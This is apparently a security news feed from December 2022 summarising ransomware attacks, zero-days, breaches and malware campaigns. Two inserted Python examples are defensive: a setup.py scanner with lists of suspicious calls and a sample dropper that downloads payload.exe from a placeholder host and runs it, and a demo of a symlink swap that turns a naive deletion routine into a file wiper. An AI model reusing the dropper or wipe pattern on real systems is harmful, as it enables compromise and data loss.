December 13, 2022 – Vulnerabilities
Citrix and NSA urge admins to fix actively exploited zero-day in Citrix ADC and Gateway Full Text
Abstract
Citrix urges customers to update their installs to fix actively exploited zero-day (CVE-2022-27518) in Citrix ADC and Gateway. Citrix urges administrators to apply security updates for a zero-day vulnerability, tracked as CVE-2022-27518, in Citrix...Security Affairs
December 13, 2022 – Attack
LockBit claims attack on California’s Department of Finance Full Text
Abstract
The Department of Finance in California has been the target of a cyberattack now claimed by the LockBit ransomware gang.BleepingComputer
December 13, 2022 – General
When Companies Compensate the Hackers, We All Foot the Bill Full Text
Abstract
Paying the piper emboldens the criminal syndicates behind the hackers and only serves to buttress ransom demands, opening the door to more attacks and burdening the consumer with higher prices.Cyware
December 13, 2022 – Criminals
Lockbit ransomware gang hacked California Department of Finance Full Text
Abstract
LockBit ransomware gang hacked the California Department of Finance and threatens to leak data stolen from its systems. The LockBit ransomware gang claims to have stolen 76Gb from the California Department of Finance and is threatening to leak the stolen...Security Affairs
December 13, 2022 – Vulnerabilities
Apple fixes new Webkit zero-day used in attacks against iPhones Full Text
Abstract
In security updates released today, Apple has fixed the tenth zero-day vulnerability since the start of the year, with this latest one actively used in attacks against iPhones.BleepingComputer
December 13, 2022 – Malware
Drokbk Flying Under the Radar by using GitHub as Dead Drop Resolver Full Text
Abstract
A previously undocumented malware, dubbed Drokbk, was linked to an Iranian hacker group known as Nemesis Kitten (aka DEV-0270). The malware uses GitHub as a dead drop resolver to extract data from a compromised system or to receive commands. The malware is written in .NET and is deployed post-intru...Cyware
December 13, 2022 – Malware
Experts detailed a previously undetected VMware ESXi backdoor Full Text
Abstract
A new Python backdoor is targeting VMware ESXi servers, allowing attackers to take over compromised systems. Juniper Networks researchers spotted a previously undocumented Python backdoor targeting VMware ESXi servers. The researchers discovered the backdoor...Security Affairs
December 13, 2022 – Vulnerabilities
Microsoft December 2022 Patch Tuesday fixes 2 zero-days, 49 flaws Full Text
Abstract
Today is Microsoft's December 2022 Patch Tuesday, and with it comes fixes for two zero-day vulnerabilities, including an actively exploited bug, and a total of 49 flaws.BleepingComputer
December 13, 2022 – General
Pwn2Own wraps with nearly $1m paid out to ethical hackers Full Text
Abstract
Pwn2Own paid out almost $1 million to bug hunters at last week's event in Toronto, but the prize money wasn't big enough to attract attempts at cracking the iPhone or Google Pixel because miscreants can score far more from less wholesome sources.Cyware
December 13, 2022 – Breach
Twitter says recently leaked user data are from 2021 breach Full Text
Abstract
Twitter confirmed that the recent leak of members' profile information resulted from the 2021 data breach disclosed in August 2022. Twitter confirmed that the recent data leak of millions of profiles resulted from the 2021 data breach that the company...Security Affairs
December 13, 2022 – Vulnerabilities
Google releases dev tool to list vulnerabilities in project dependencies Full Text
Abstract
Google has launched OSV Scanner, a new tool that allows developers to scan for vulnerabilities in open-source software dependencies used in their project.BleepingComputer
December 13, 2022 – Ransomware
New Ransomware Families Lead Attacks Against Windows Systems Full Text
Abstract
According to Fortinet, three new (typical) ransomware families, named Aerst, ScareCrow, and Vohuk, are being increasingly used in attacks. The core target of the malware infection remains users in Germany and India. Experts have jotted down some similarities between ScareCrow and Conti, suggesting...Cyware
December 13, 2022 – Botnet
New GoTrim botnet brute forces WordPress site admin accounts Full Text
Abstract
A new Go-based botnet malware named 'GoTrim' is scanning the web for self-hosted WordPress websites and attempting to brute force the administrator's password and take control of the site.BleepingComputer
December 13, 2022 – Attack
Ukrainian Railway, Government Agencies Allegedly Targeted by DolphinCape Malware Full Text
Abstract
The attacks involved an email campaign in which hackers sent out messages purportedly on behalf of Ukraine’s State Emergency Service with tips on how to identify a kamikaze drone.Cyware
December 13, 2022 – Vulnerabilities
Hackers exploit critical Citrix ADC and Gateway zero day, patch now Full Text
Abstract
Citrix strongly urges admins to apply security updates for a 'Critical' zero-day vulnerability (CVE-2022-27518) in Citrix ADC and Gateway that is actively exploited by state-sponsored hackers to gain access to corporate networks.BleepingComputer
December 13, 2022 – General
24% of technology applications contain high-risk security flaws Full Text
Abstract
With, arguably, a higher proportion of applications to contend with than other industries, tech firms would benefit from implementing improved secure coding training and practices for their development teams.Cyware
December 13, 2022 – Vulnerabilities
Amazon ECR Public Gallery flaw could have wiped or poisoned any image Full Text
Abstract
A severe security flaw in the Amazon ECR (Elastic Container Registry) Public Gallery could have allowed attackers to delete any container image or inject malicious code into the images of other AWS accounts.BleepingComputer
December 13, 2022 – Cryptocurrency
Chaos RAT Sharpens Up Cryptocurrency Mining Attack Campaign Full Text
Abstract
Trend Micro researchers spotted a cryptocurrency mining campaign against Linux machines using the open-source Chaos RAT to deploy a Monero miner, among other functions. The main server is located in Russia and uses cloud-bulletproof hosting to hide its whereabouts. Experts suggest individuals an...Cyware
December 12, 2022 – Attack
Play ransomware claims attack on Belgium city of Antwerp Full Text
Abstract
The Play ransomware operation has claimed responsibility for a recent cyberattack on the Belgium city of Antwerp.BleepingComputer
December 12, 2022 – Government
Australia Aims to Be World’s ‘Most Cyber-Secure’ Country Full Text
Abstract
A top Australian official vowed to transform the country into "the world’s most cyber-secure country by 2030" after a wave of data breaches revealed the personal data of millions of residents.Cyware
December 12, 2022 – Vulnerabilities
Fortinet urges customers to fix actively exploited FortiOS SSL-VPN bug Full Text
Abstract
Fortinet fixed an actively exploited FortiOS SSL-VPN flaw that could allow a remote, unauthenticated attacker to execute arbitrary code on devices. Fortinet urges customers to update their installs to address an actively exploited FortiOS SSL-VPN...Security Affairs
December 12, 2022 – Malware
New Python malware backdoors VMware ESXi servers for remote access Full Text
Abstract
A previously undocumented Python backdoor targeting VMware ESXi servers has been spotted, enabling hackers to execute commands remotely on a compromised system.BleepingComputer
December 12, 2022 – Ransomware
Researchers Warn of New Aerst, ScareCrow, and Vohuk Ransomware Families Full Text
Abstract
Targeting Windows computers, these are typical ransomware families that encrypt victim files and demand a ransom payment in exchange for a decryption key. These new ransomware have been used in an increasing number of attacks.Cyware
December 12, 2022 – Breach
Indian foreign ministry’s Global Pravasi Rishta portal leaks expat passport details Full Text
Abstract
The Cybernews research team reported that India’s government platform Global Pravasi Rishta Portal was leaking sensitive user data. Original post @ https://cybernews.com/security/indias-foreign-ministry-leaks-passport-details/ The Global Pravasi...Security Affairs
December 12, 2022 – Breach
Twitter confirms recent user data leak is from 2021 breach Full Text
Abstract
Twitter confirmed today that the recent leak of millions of members' profiles, including private phone numbers and email addresses, resulted from the same data breach the company disclosed in August 2022.BleepingComputer
December 12, 2022 – Attack
Knox College president addresses ransomware incident as notorious group claims credit Full Text
Abstract
The Hive ransomware group claimed to have encrypted “critical infrastructure and data,” compromised the college’s backup servers, and mined sensitive personal information like medical records and social security numbers.Cyware
December 12, 2022 – Cryptocurrency
Cryptomining campaign targets Linux systems with Go-based CHAOS Malware Full Text
Abstract
Researchers spotted a cryptocurrency mining campaign targeting Linux users with Go-based CHAOS malware (Trojan.Linux.CHAOSRAT). In November 2022, Trend Micro researchers discovered a cryptocurrency mining campaign targeting Linux users with Go-based...Security Affairs
December 12, 2022 – Breach
Uber suffers new data breach after attack on vendor, info leaked online Full Text
Abstract
Uber has suffered a new data breach after a threat actor leaked employee email addresses, corporate reports, and IT asset information stolen from a third-party vendor in a cybersecurity incident.BleepingComputer
December 12, 2022 – Breach
Data breach of Ontario’s vaccine booking system affects hundreds of thousands, province says Full Text
Abstract
Some 360,000 people will receive notices that their personal information was part of the November 2021 data breach of the COVAXX system, the Ministry of Public and Business Service Delivery said in a statement Friday.Cyware
December 12, 2022 – Hacker
Evilnum group targets legal entities with a new Janicab variant Full Text
Abstract
A hack-for-hire group dubbed Evilnum is targeting travel and financial entities with the new Janicab malware variant. Kaspersky researchers reported that a hack-for-hire group dubbed Evilnum is targeting travel and financial entities. The attacks...Security Affairs
December 12, 2022 – Vulnerabilities
Fortinet says SSL-VPN pre-auth RCE bug is exploited in attacks Full Text
Abstract
Fortinet urges customers to patch their appliances against an actively exploited FortiOS SSL-VPN vulnerability that could allow unauthenticated remote code execution on devices.BleepingComputer
December 12, 2022 – Malware
Python, JavaScript Developers Targeted With Fake Packages Delivering Ransomware Full Text
Abstract
On Friday, Phylum security researchers warned that a threat actor was typosquatting popular PyPI packages to direct developers to malicious dependencies containing code to download payloads written in Golang (Go).Cyware
December 12, 2022 – Attack
TrueBot infections were observed in Clop ransomware attacks Full Text
Abstract
Researchers reported an increase in TrueBot infections; attackers have shifted from using malicious emails as their primary delivery method to other techniques. Cisco Talos researchers reported an increase in TrueBot infections, threat actors...Security Affairs
December 12, 2022 – Solution
Cloudflare’s Zero Trust suite now available for free to at-risk groups Full Text
Abstract
Cloudflare has made its 'Cloudflare One Zero Trust' security suite free to public interest groups, election sites, and state organizations that are currently part of Project Galileo and the Athenian Project.BleepingComputer
December 12, 2022 – Vulnerabilities
Over 4,000 Vulnerable Pulse Connect Secure Hosts Exposed to Internet Full Text
Abstract
Pulse Secure appliances are known for being the target of choice for both cybercriminals and state-sponsored threat actors, and government agencies have issued multiple alerts to warn of the continuous exploitation of unpatched vulnerabilities.Cyware
December 12, 2022 – Policy and Law
UK: New rules for apps to boost consumer security and privacy Full Text
Abstract
Consumers in the U.K. will be better protected from malicious apps which can steal data and money, thanks to new privacy and security rules for app store operators and developers.Cyware
December 12, 2022 – Vulnerabilities
A Year Later, That Brutal Log4j Vulnerability Is Still Lurking Full Text
Abstract
Attackers are still actively exploiting Log4Shell everywhere they can, from criminal hackers looking for a way into targets' systems to Chinese and Iranian state-backed attackers deploying the exploit in their espionage campaigns.Cyware
December 12, 2022 – Breach
Australian Telecom Firm Leaks Data of 130,000 Unlisted Customers Full Text
Abstract
"We're in the process of communicating to some unlisted customers whose details were incorrectly made available via Directory Assistance or the White Pages," Telstra said in a Friday statement.Cyware
December 11, 2022 – Ransomware
Clop ransomware uses TrueBot malware for access to networks Full Text
Abstract
Security researchers have noticed a spike in devices infected with the TrueBot malware downloader created by a Russian-speaking hacking group known as Silence.BleepingComputer
December 11, 2022 – General
Pwn2Own Toronto 2022 Day 4: $989K awarded for 63 unique zero-days Full Text
Abstract
Pwn2Own Toronto 2022 has ended, and the participants earned a total of $989,750 for 63 unique zero-day exploits. The Zero Day Initiative’s Pwn2Own Toronto 2022 hacking competition has ended and these are the final numbers for the event: $989,750...Security Affairs
December 11, 2022 – General
Security Affairs newsletter Round 397 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter has arrived! Every week, the best security articles from Security Affairs, free for you in your inbox. If you also want to receive the free newsletter with the international press, subscribe here. At...Security Affairs
December 11, 2022 – APT
MuddyWater APT group is back with updated TTPs Full Text
Abstract
The Iran-linked MuddyWater APT is targeting countries in the Middle East as well as Central and West Asia in a new campaign. Deep Instinct’s Threat Research team uncovered a new campaign conducted by the MuddyWater APT (aka SeedWorm, TEMP.Zagros,...Security Affairs
December 10, 2022 – Vulnerabilities
Air-gapped PCs vulnerable to data theft via power supply radiation Full Text
Abstract
A new attack method named COVID-bit uses electromagnetic waves to transmit data from air-gapped systems isolated from the internet over a distance of at least two meters (6.5 ft), where it is captured by a receiver.BleepingComputer
December 10, 2022 – Hacker
Hackers earn $989,750 for 63 zero-days exploited at Pwn2Own Toronto Full Text
Abstract
Pwn2Own Toronto 2022 has ended with competitors earning $989,750 for 63 zero-day exploits (and multiple bug collisions) targeting consumer products between December 6th and December 9th.BleepingComputer
December 10, 2022 – Vulnerabilities
At least 4,460 vulnerable Pulse Connect Secure hosts are exposed to the Internet Full Text
Abstract
Censys researchers warn of more than 4,000 vulnerable Pulse Connect Secure hosts exposed to the Internet. Pulse Connect Secure is a widely deployed SSL VPN solution for remote and mobile users, and for this reason it is a target of attacks by multiple...Security Affairs
December 10, 2022 – Government
US HHS warns healthcare orgs of Royal Ransomware attacks Full Text
Abstract
The US Department of Health and Human Services (HHS) warns healthcare organizations of Royal ransomware attacks. The human-operated Royal ransomware first appeared on the threat landscape in September 2022 and has demanded ransoms of up to millions of dollars....Security Affairs
December 09, 2022 – Ransomware
The Week in Ransomware - December 9th 2022 - Wide Impact Full Text
Abstract
This week has been filled with research reports and news of significant attacks having a wide impact on many organizations.BleepingComputer
December 9, 2022 – APT
Iranian APT Targets US With Drokbk Spyware via GitHub Full Text
Abstract
A subgroup of the state-backed Iranian threat actor Cobalt Mirage is using a new custom malware dubbed "Drokbk" to attack a variety of US organizations, using GitHub as a "dead-drop resolver."Cyware
December 9, 2022 – Breach
CommonSpirit confirms data breach impacts 623K patients Full Text
Abstract
CommonSpirit Health confirmed that the October security breach resulted in the exposure of the personal data of 623,774 patients. In early October, CommonSpirit, one of the largest hospital chains in the US, suffered a ransomware attack that...Security Affairs
December 09, 2022 – Phishing
Rackspace warns of phishing risks following ransomware attack Full Text
Abstract
Cloud computing provider Rackspace warned customers on Thursday of increased risks of phishing attacks following a ransomware attack affecting its hosted Microsoft Exchange environment.BleepingComputer
December 9, 2022 – Vulnerabilities
Over 4,000 Vulnerable Pulse Connect Secure Hosts Exposed to Internet Full Text
Abstract
More than 4,000 internet-accessible Pulse Connect Secure hosts are impacted by at least one known vulnerability, attack surface management firm Censys warns. Pulse Connect Secure provides remote users with secure access to corporate resources.Cyware
December 9, 2022 – General
Pwn2Own Toronto 2022 Day 3: Participants earned nearly $1 million Full Text
Abstract
On the third day of the Zero Day Initiative’s Pwn2Own Toronto 2022 hacking competition, participants earned more than $250,000...Security Affairs
December 09, 2022 – Criminals
Australia arrests ‘Pig Butchering’ suspects for stealing $100 million Full Text
Abstract
The Australian Federal Police (AFP) have arrested four suspected members of a financial investment scam syndicate estimated to have stolen $100 million from victims worldwide.BleepingComputer
December 9, 2022 – Attack
Supply Chain Attack via New Malicious Python Package, “shaderz” Full Text
Abstract
This Python package was published on December 2, 2022, as shown in its official PyPI repository. The package includes malicious code in its setup.py installation script that downloads and runs an executable file as a part of its installation.Cyware
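The install-time behaviour described above (a setup.py that fetches and runs a binary while `pip install` is executing) is something a practitioner can check for before installing an unfamiliar package. The following is an added example, not code from the shaderz package or from PyPI: it parses a setup.py into an AST, resolves import aliases so that `import subprocess as sp` is still recognised, and flags calls that download content, execute programs, or decode blobs at install time. The two setup.py texts embedded in it are constructed for the demonstration and do not reproduce the real package's code.

```python
"""Static triage of a setup.py for install-time download-and-execute behaviour.

Added example; the sample setup.py strings below are constructed, not the real
shaderz code. Run it directly to see the verdict for each sample.
"""
import ast

# Dotted call names that have no business running inside setup.py.
NETWORK_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post", "http.client.HTTPSConnection",
    "socket.socket",
}
EXEC_CALLS = {
    "subprocess.Popen", "subprocess.run", "subprocess.call",
    "subprocess.check_output", "os.system", "os.popen", "os.startfile",
    "exec", "eval", "ctypes.CDLL",
}
DECODE_CALLS = {"base64.b64decode", "codecs.decode", "zlib.decompress"}


def _dotted(node):
    """Rebuild 'a.b.c' from an ast.Attribute/ast.Name chain; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _resolve_alias(name, aliases):
    """Map 'sp.Popen' back to 'subprocess.Popen' when 'import subprocess as sp' was used."""
    head, _, rest = name.partition(".")
    full = aliases.get(head, head)
    return f"{full}.{rest}" if rest else full


def scan_setup_py(source):
    """Return sorted (line, kind, call) findings for one setup.py source text."""
    tree = ast.parse(source)
    aliases = {}
    # Record import aliases first so aliased modules are still recognised.
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        if name is None:
            continue
        name = _resolve_alias(name, aliases)
        for kind, table in (("network", NETWORK_CALLS),
                            ("exec", EXEC_CALLS),
                            ("decode", DECODE_CALLS)):
            if name in table:
                findings.append((node.lineno, kind, name))
    return sorted(findings)


def verdict(findings):
    """A download plus an execution in the same setup.py is the dropper pattern."""
    kinds = {kind for _, kind, _ in findings}
    if {"network", "exec"} <= kinds:
        return "dropper"
    return "suspicious" if kinds else "clean"


# Constructed sample: a custom install command that fetches and runs a binary.
# The aliased imports are deliberate; a plain grep for "subprocess" would miss them.
SUSPECT_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request as ur
import subprocess as sp

class PostInstall(install):
    def run(self):
        install.run(self)
        ur.urlretrieve("http://example.invalid/payload.exe", "payload.exe")
        sp.Popen(["payload.exe"])

setup(name="shaderz", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample: an ordinary setup.py with no install hooks.
CLEAN_SETUP_PY = '''
from setuptools import setup
setup(name="harmless", version="1.0", packages=["harmless"])
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_SETUP_PY), ("clean", CLEAN_SETUP_PY)):
        found = scan_setup_py(src)
        print(label, verdict(found), found)
```

The check is deliberately narrow: it looks only at what runs at install time, which is the part of a package that executes before anyone has imported it. A package that merely ships a `requests` dependency is not flagged; one that calls it from setup.py is.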
December 9, 2022 – Vulnerabilities
Cisco discloses high-severity flaw impacting IP Phone 7800 and 8800 Series Full Text
Abstract
Cisco disclosed a high-severity flaw in its IP phones that can be exploited to gain remote code execution and conduct DoS attacks. Cisco disclosed a high-severity vulnerability, tracked as CVE-2022-20968, impacting its IP Phone 7800 and 8800 Series...Security Affairs
December 09, 2022 – Vulnerabilities
Antivirus and EDR solutions tricked into acting as data wipers Full Text
Abstract
A security researcher has found a way to exploit the data deletion capabilities of widely used endpoint detection and response (EDR) and antivirus (AV) software from Microsoft, SentinelOne, TrendMicro, Avast, and AVG to turn them into data wipers.BleepingComputer
December 9, 2022 – Breach
Popular HR and Payroll Company Sequoia Discloses a Data Breach Full Text
Abstract
“An unauthorized party may have accessed a cloud storage system that contained personal information,” the company wrote in the customer and individual disclosures. WIRED reviewed examples of both notifications.Cyware
December 9, 2022 – Vulnerabilities
Experts devised a technique to bypass web application firewalls (WAF) of several vendors Full Text
Abstract
Researchers at industrial and IoT cybersecurity firm Claroty devised an attack technique for bypassing the web application firewalls (WAF)...Security Affairs
December 09, 2022 – Vulnerabilities
Samsung Galaxy S22 hacked in 55 seconds on Pwn2Own Day 3 Full Text
Abstract
On the third day of Pwn2Own, contestants hacked the Samsung Galaxy S22 a fourth time since the start of the competition, and this time they did it in just 55 seconds.BleepingComputer
December 9, 2022 – Ransomware
New Ransom Payment Schemes Target Executives, Telemedicine – Krebs on Security Full Text
Abstract
Ransomware groups are constantly devising new methods for infecting victims and convincing them to pay up, but a couple of strategies tested recently seem especially devious.Cyware
December 09, 2022 – General
Holiday 2022 deal: 20% off Zero2Automated malware analysis training Full Text
Abstract
Zero2Automated, the creators of the popular malware analysis and reverse-engineering course, is having a Christmas special where you can get 20% off all courses on their site, with additional goodies thrown in.BleepingComputer
December 9, 2022 – Policy and Law
NDAA requires intelligence agencies to study creation of cyber collaboration program Full Text
Abstract
Federal agencies in charge of intelligence and cybersecurity will be required by the NDAA bill to study how to build a new cyber information collaboration environment to enable government and industry to better mitigate malicious cyber activity.Cyware
December 9, 2022 – Vulnerabilities
Vulnerabilities Allow Researcher to Turn EDR and AV Security Products Into Wipers Full Text
Abstract
Dubbed Aikido, the researcher’s wiper abuses the extended privileges that EDR and AV products have on the system, relying on decoy directories containing specially crafted paths to trigger the deletion of legitimate files.Cyware
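The weakness Aikido exploits is a classic time-of-check/time-of-use gap: the product records a path at detection time and deletes whatever that path names at remediation time. The example below is added here and is not SafeBreach's Aikido code nor any vendor's remediation routine. It models the "decoy directory" swap with a symbolic link (an assumption made for portability; the real technique is reported against Windows products, where the equivalent object is a junction or other reparse point) and contrasts a naive delete with one that re-walks the path at deletion time, refuses to cross any link, and confirms the resolved target still sits under the directory it was asked to clean. The directory layout built by build_fixture() is constructed for the demonstration.

```python
"""Naive vs. hardened file deletion for a quarantine/remediation routine.

Added example. The fixture is constructed: scan_root/decoy/evil.txt is the
planted decoy, victim/evil.txt is the legitimate file an attacker wants wiped.
"""
import os
import pathlib
import shutil
import stat
import tempfile


def naive_unlink(root, rel):
    """What a remediation routine must NOT do: trust the path recorded at
    detection time and delete whatever it resolves to now."""
    os.unlink(pathlib.Path(root) / rel)


def _is_link(path):
    """True for symlinks on every OS and for junctions/reparse points on Windows."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return False
    if stat.S_ISLNK(st.st_mode):
        return True
    attrs = getattr(st, "st_file_attributes", 0)  # Windows-only field
    return bool(attrs & stat.FILE_ATTRIBUTE_REPARSE_POINT)


def safe_unlink(root, rel):
    """Delete root/rel only if every component below root is a real directory
    and the final entry is a regular file. Returns (deleted, reason)."""
    root = pathlib.Path(root).resolve(strict=True)
    rel = pathlib.PurePath(rel)
    if rel.is_absolute() or ".." in rel.parts:
        return False, "path must be relative to root and may not climb"
    cur = root
    for part in rel.parts:
        cur = cur / part
        # Re-check at deletion time: a link inserted after detection means the
        # name no longer refers to what was scanned.
        if _is_link(cur):
            return False, f"link component: {cur}"
    if not cur.is_file():
        return False, "not a regular file"
    # Belt and braces: the fully resolved path must still sit under root.
    try:
        cur.resolve(strict=True).relative_to(root)
    except ValueError:
        return False, "resolved target escapes root"
    os.unlink(cur)
    return True, "deleted"


def build_fixture():
    """Constructed layout for the demo; returns (base, scan_root, victim)."""
    base = pathlib.Path(tempfile.mkdtemp(prefix="aikido-demo-"))
    root, victim = base / "scan_root", base / "victim"
    (root / "decoy").mkdir(parents=True)
    victim.mkdir()
    (victim / "evil.txt").write_text("legitimate data the attacker wants wiped\n")
    (root / "decoy" / "evil.txt").write_text("planted decoy that trips detection\n")
    return base, root, victim


def demo():
    """Run the three steps and return their outcomes as a dict."""
    base, root, victim = build_fixture()
    out = {}
    # Step 1: the decoy really is under the scan root, so deleting it is fine.
    out["honest_deleted"], _ = safe_unlink(root, "decoy/evil.txt")
    # Step 2 (the swap): the attacker removes the decoy directory and puts a
    # link with the same name in its place, pointing at the victim directory.
    os.rmdir(root / "decoy")
    os.symlink(victim, root / "decoy", target_is_directory=True)
    out["swapped_deleted"], out["swapped_reason"] = safe_unlink(root, "decoy/evil.txt")
    out["victim_intact_after_safe"] = (victim / "evil.txt").is_file()
    # Step 3: the naive routine follows the link and wipes the legitimate file.
    naive_unlink(root, "decoy/evil.txt")
    out["victim_intact_after_naive"] = (victim / "evil.txt").is_file()
    shutil.rmtree(base)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the component walk is that checking only the final path is not enough: the file at the end of the chain is a perfectly ordinary regular file, and it is the directory above it that has been rewired. Any remediation that runs with elevated privileges, whether a product's own quarantine code or an incident-response cleanup script, wants the same two properties: no link traversal, and a resolved target inside the intended root.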
December 08, 2022 – Vulnerabilities
Cisco discloses high-severity IP phone zero-day with exploit code Full Text
Abstract
Cisco has disclosed today a high-severity zero-day vulnerability affecting the latest generation of its IP phones and exposing them to remote code execution and denial of service (DoS) attacks.BleepingComputer
December 08, 2022 – Government
US Health Dept warns of Royal Ransomware targeting healthcare Full Text
Abstract
The U.S. Department of Health and Human Services (HHS) issued a new warning today for the country's healthcare organizations regarding ongoing attacks from a relatively new operation, the Royal ransomware gang.BleepingComputer
December 8, 2022 – Criminals
Cybercriminals Attacking Each Other Gives Defenders Access to Inside Info Full Text
Abstract
Researchers discovered a new sub-economy linked to cybercriminal activity: hackers scamming each other for millions of dollars. This practice led to the emergence of arbitration rooms in forums to settle conflicts.Cyware
December 8, 2022 – Malware
Zombinder APK binding service used in multiple malware attacks Full Text
Abstract
Zombinder is a third-party service on darknet used to embed malicious payloads in legitimate Android applications. While investigating a new malware campaign targeting Android and Windows systems, researchers at Threat Fabric discovered a darknet...Security Affairs
December 08, 2022 – Breach
Hacked corporate email accounts used to send MSP remote access tool Full Text
Abstract
MuddyWater hackers, a group associated with Iran's Ministry of Intelligence and Security (MOIS), used compromised corporate email accounts to deliver phishing messages to their targets.BleepingComputer
December 8, 2022 – Ransomware
Babuk Ransomware Variant in Major New Attack Full Text
Abstract
Attackers used a new Babuk strain to target a multibillion-dollar manufacturing company with more than 10,000 workstations and server devices. The attackers had network access for two weeks of full reconnaissance prior to launching their attack.Cyware
December 8, 2022 – General
Pwn2Own Toronto 2022 Day 2: Participants earned $281K Full Text
Abstract
Pwn2Own Toronto 2022 Day Two: participants demonstrated exploits for a smart speaker, a smartphone, a printer, a router, and a NAS device. On the first day of the Zero Day Initiative’s Pwn2Own Toronto 2022 hacking competition, participants earned $400,000 for 26 unique...Security Affairs
December 08, 2022 – Breach
CommonSpirit Health ransomware attack exposed data of 623,000 patients Full Text
Abstract
CommonSpirit Health has confirmed that threat actors accessed the personal data for 623,774 patients during an October ransomware attack.BleepingComputer
December 8, 2022 – Malware
Trojanized OneNote Document Leads to Formbook Malware Full Text
Abstract
Trustwave SpiderLabs’ researchers uncovered threat actors using a OneNote document to move Formbook malware, an information stealing trojan sold on an underground hacking forum since mid-2016 as malware-as-a-service.Cyware
December 8, 2022 – Vulnerabilities
Android app with over 5m downloads leaked user browsing history Full Text
Abstract
The Android app Web Explorer – Fast Internet left an open instance exposed, leaking a trove of sensitive data that malicious actors could use to look up specific users’ browsing history. Original post at https://cybernews.com/security/android-app-leaked-user-browsing-history/ A...Security Affairs
December 08, 2022 – Vulnerabilities
Cisco discloses high-severity IP phone bug with exploit code Full Text
Abstract
Cisco has disclosed today a high-severity vulnerability affecting the latest generation of its IP phones and exposing unpatched devices to remote code execution and denial of service (DoS) attacks.BleepingComputer
December 8, 2022 – Phishing
Direct Deposit Scams Around Holiday Scam Full Text
Abstract
Though this happens all the time, the fact that we're seeing an influx around the holidays is an interesting trend. It means that hackers are actively targeting people when they are most likely to be spending their money.Cyware
December 8, 2022 – APT
APT37 used Internet Explorer Zero-Day in a recent campaign Full Text
Abstract
Google warns that the North Korea-linked APT37 group is exploiting an Internet Explorer zero-day flaw to spread malware. The North Korea-linked APT37 group (aka ScarCruft, Reaper, and Group123) actively exploited an Internet Explorer zero-day vulnerability,...Security Affairs
December 08, 2022 – Solution
Tor Browser 12.0 brings Apple Silicon support, Android enhancements Full Text
Abstract
The Tor Project team has announced the release of Tor Browser 12.0, a major version release introducing support for Apple Silicon chips and several enhancements for the Android version.BleepingComputer
December 8, 2022 – Attack
French Sporting Goods Retailer Intersport Hit by Hive Ransomware Group Full Text
Abstract
The breach allegedly happened in November, with details made available only on the dark web. Passports, paystubs, and other details on Intersport customers are included in a sample file that media outlet Numerama claims Hive leaked on the dark web.Cyware
December 08, 2022 – Solution
Google: How Android’s Private Compute Core protects your data Full Text
Abstract
Google has disclosed more technical details about how Private Compute Core (PCC) on Android works and keeps sensitive user data processed locally on protected devices.BleepingComputer
December 8, 2022 – Outage
Cyberattack Takes Down the Met Opera’s Website and Box Office Full Text
Abstract
The Metropolitan Opera has been the victim of a cyberattack that has kept its website and box office out of commission for more than 30 hours, the company’s general manager said on Wednesday.Cyware
December 08, 2022 – Vulnerabilities
Samsung Galaxy S22 hacked again on second day of Pwn2Own Full Text
Abstract
Contestants hacked the Samsung Galaxy S22 again during the second day of the consumer-focused Pwn2Own 2022 competition in Toronto, Canada.BleepingComputer
December 8, 2022 – Attack
Cincinnati restaurants under attack by cyber hackers Full Text
Abstract
Multiple restaurants in Cincinnati, Ohio, are fighting cyber hackers who have stolen thousands of dollars, damaged their reputations, and shut down their social media pages.Cyware
December 08, 2022 – Criminals
Automated dark web markets sell corporate email accounts for $2 Full Text
Abstract
Cybercrime marketplaces are increasingly selling stolen corporate email addresses for as low as $2 to fill a growing demand by hackers who use them for business email compromise and phishing attacks or initial access to networks.BleepingComputer
December 8, 2022 – Business
Vaultree raises $12.8M to let companies more easily work with encrypted data Full Text
Abstract
Vaultree this week closed a $12.8 million Series A round co-led by Molten Ventures and Ten Eleven Ventures, with participation from SentinelOne, Elkstone Partners, CircleRock Capital, and Cyber Club London.Cyware
December 08, 2022 – Malware
New ‘Zombinder’ platform binds Android malware with legitimate apps Full Text
Abstract
A darknet platform dubbed 'Zombinder' allows threat actors to bind malware to legitimate Android apps, causing victims to infect themselves while still having the full functionality of the original app to evade suspicion.BleepingComputer
December 8, 2022 – Breach
Update: Patients’ Data at Seven More Hospitals Breached in CommonSpirit Ransomware Attack Full Text
Abstract
Patients of at least seven hospitals in Washington state affiliated with CommonSpirit have been affected by a data breach involving the hospital chain's October ransomware incident.Cyware
December 07, 2022 – Phishing
Elon Musk “Freedom Giveaway” crypto scam promoted via Twitter lists Full Text
Abstract
Twitter accounts giving Elon Musk a follow are being targeted in a crypto giveaway scam dubbed 'Freedom Giveaway.'BleepingComputer
December 07, 2022 – Encryption
Apple rolls out end-to-end encryption for iCloud backups Full Text
Abstract
Apple introduced today Advanced Data Protection for iCloud, a new feature that uses end-to-end encryption to protect sensitive iCloud data, including backups, photos, notes, and more.BleepingComputer
December 7, 2022 – Policy and Law
Meta Expected to Face New Fines After EU Privacy Ruling Full Text
Abstract
Meta is expected to face another large fine after Europe's data watchdog on Tuesday imposed binding decisions concerning the treatment of personal data by the owner of Facebook, Instagram and WhatsApp.Cyware
December 7, 2022 – Botnet
New Go-based botnet Zerobot exploits dozens of flaws Full Text
Abstract
Researchers discovered a new Go-based botnet called Zerobot that exploits two dozen security vulnerabilities in IoT devices. Fortinet FortiGuard Labs researchers have discovered a new Go-based botnet called Zerobot that spreads by exploiting two dozen...Security Affairs
December 07, 2022 – Malware
New Zerobot malware has 21 exploits for BIG-IP, Zyxel, D-Link devices Full Text
Abstract
